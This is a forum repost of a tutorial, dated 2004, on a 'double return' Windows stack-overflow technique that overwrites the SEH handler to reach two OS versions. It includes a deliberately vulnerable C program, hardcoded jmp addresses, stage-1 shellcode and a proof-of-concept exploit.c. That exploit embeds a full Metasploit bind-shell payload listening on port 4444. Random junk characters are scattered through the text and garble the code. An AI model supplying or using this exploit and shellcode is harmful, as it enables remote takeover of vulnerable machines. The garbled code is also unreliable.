The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.& G0 \' Z; t- n$ g
) W$ b& P) f' m3 v) |) n4 l( G: v( H
[Buf] <- Shellcode 6 E- x, J2 O( L# G! e3 O[Return Address] <- jmp register (for Windows XP sp1)0 v2 _% T* Y. k8 L; R
[Various Stack Data] <- Junk 6 E9 a1 B8 r$ v6 V* p9 m[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward$ w3 ^' m( P& j! [& v
[SE Handler] <- jmp register (for Win2k sp4)+ T" Q& ^' C" F2 t. X
[Stage1 Shellcode] <- stage1 shellcode for win2k1 f3 e5 W3 N* h3 I# O/ P
6 _& h; q! E1 V, }0 s8 k& `) T
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses 6 r$ d. R* R' _. |0 V* l; c+ p9 n2 {+ ?0 B$ u5 C
Necessary Tools: 4 B( C5 h1 ?- U( ^* u0 K- OllyDBG( w G/ H) @8 ?5 _
- C/C++ Compiler 2 K% _. O5 f* [( ~, F4 ]! I- nasm ( j: A/ c5 L7 [, E* B- Sac% ~( B2 a; V* W2 P, x, B4 Z
% {2 V& B' _" |1 oVulnerable Code:* U9 E0 C! G* m Y* b2 s
//lamebuf.c D$ C' j- ? x# {! `* e: K' f#include<stdio.h> $ c; [& g, P6 I#include<string.h>8 K. R W- ?% J9 n4 k! K
#include<windows.h>( j. L( }9 [0 _6 ^1 }* P
int main(int argc,char *argv[]){/ _5 i2 I0 P8 r. M2 |4 m
u1 ]& z& T1 f; n( d! N/ b
char buf[512];* G9 r7 N$ M% ]6 e2 z" A
char buf1[1024]; // <- simulate a stack: f2 ?6 L5 m' x3 J/ m W
//DebugBreak(); 2 W* c2 X; W' mif (argc != 2){ return -1; }' G& r5 }# [% X( @; K8 l
; I: \9 m) j) e3 u. k$ \strcpy(buf,argv[1]); ) h4 R( ]% L7 ]0 W: zreturn 0x0;( ?+ d* J% B0 T+ W3 U
} 3 w( M, @3 `0 e8 W* @ M8 P% m8 w# o# x+ X: R
Getting Started:" [* x1 T* f- U- S- x2 P3 r$ ~5 w
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:3 j: U: }9 M5 O# |3 S9 P' N
: U) N: |+ ~ b; @ J4 X
EAX 00000000 6 J- S7 l/ f. Z, k( R7 R" fECX 00321404 ; ~- W2 Z X, }# F2 s: F$ }EDX 00414141" j+ [9 f" F4 N& q' ]% e5 O
EBX 7FFDF000" q+ k4 b" M5 q8 v" m
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") N1 Q# S+ c+ c# ` n% r& t4 R1 H
EBP 41414141 ; ^0 U, |" K( Q: d' E! E# v. `ESI 77D4595F- C) x$ u( _7 ^, k# l: f
EDI 77F59037 ntdll.77F590376 _/ e1 m9 y# T
EIP 41414141' V5 b0 z- L) z
0 `0 F! a; p" U+ Y) I& x
Lets take a look at the stack and see what happened to the default exception handler: - R/ S4 w( A* ?. @) y/ G# Q1 ]- z a0x0012FFB0 41414141 Pointer to next SEH Record/ h+ v" z1 h- `5 D7 N: Q
0x0012FFB4 41414141 SE Handler 9 I8 H& d4 y# z% M' u0 ~6 O# D8 ^- ^
We successfully overwrote the return address and the default exception handler. ( U3 H: i4 Q2 q$ Z1 f8 Z9 [+ p+ b. K2 W
Primary Return Address (Windows XP SP1 EN):- u. k% ^; Q2 m0 W
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be: + Z. B: y: U6 R1 [ x* y& S' q"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4" + v% x$ j; K* e" \9 F! Y$ F4 V# }2 E( f" s: y
Secondary Return Address (Windows 2000 SP4 EN):$ m7 ?. D. q C) {5 G- {9 w4 f
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:/ o* e+ N5 j5 |$ F
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1". R9 `! R6 r! l+ W' Q; A4 M
" r% i7 f3 t. [/ \: o' E7 b) d
Proof Of Concept: - `5 e/ a x( b4 X* i, m// exploit.c6 N% M1 |, I- k# S" S# a* B" G
// Tal zeltzer - [Double Return] // + i& m% S1 X; a. s: o. ^4 q/ k/ X; @( C4 Q; c: j. v
#include<stdio.h>) H0 p- q2 S: B, J2 i2 }' z
#include<string.h> # ~$ M' s3 B7 V, }3 b#include<windows.h>: a6 Q1 T. a7 | d8 \
1 N" s$ t9 l4 L1 e' D% A#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp2 h# T2 k. n& M) J/ p3 B! R' B
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx2 |- v: D! s5 v! k5 l. {0 v
, e3 D } }* P4 T
// Stage1 For WinXP Sp1 English; x- F; F) }3 p0 `
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";, x: S0 O1 w1 o! q6 l0 ]
Q$ g, F. N7 p( i# W4 j
// Stage1 For Win2k Sp4 English( f7 ?3 K- Q- D7 A5 O& P' s6 X% ^6 c/ R X
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"; 0 ]; n7 t/ A7 u- x& g: b' A" m% t G( ~( n, {4 k2 d
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com N$ S; C0 ?8 e2 M( E1 [
unsigned char shellcode[] =, }' @1 m2 f, k( U* Z# `
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85" ( M C- F* \+ C( s+ w1 `5 T5 _ N7 ["\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19" X J# m2 N6 ?" F7 B"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05" - q7 ]0 X" l" v3 c0 p$ {1 E"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"! g% n& V4 d# u5 z1 ^" N
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74" ! Q1 m; f4 P- y"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15" 3 k g- y- y9 s+ i" S"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"/ M: T R. Q7 K3 ^4 k! d6 @
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"% \7 ?* @% ^0 {4 O. I, }2 p
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" - H, x3 D. Q3 z; Q"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"3 i6 @0 t) C, }* c* k( k
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb" : n0 k: ]3 g9 [" s$ l8 d m( `"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18" , M4 O3 l6 q! E) i% }: N% p"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" * Q* A! d* f* d' f+ s"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"5 k6 @* r: s8 T( E+ j
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" 1 q9 J2 u/ @. f: K"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c". L% k; e+ t" ]# M
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18" 9 X" c+ B P6 L8 g! @"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f" 5 T# l P0 J( H8 R% T9 m3 p) n2 C' Y"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"0 ]' g% R8 x0 _( O/ J$ Y% Q
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"# N7 d/ |7 A! t6 S' x) m
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f". h. O# @5 ^1 G2 u& t9 B3 [8 n
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"6 _2 ^1 d4 Y3 _1 L
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" 8 X; x7 ^9 ?0 u; k! S"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" 8 H* L# Z/ z0 q5 \ e"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98"; 6 j6 Z6 A5 k5 \. m s" B: ^1 C5 q8 v- P9 w
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
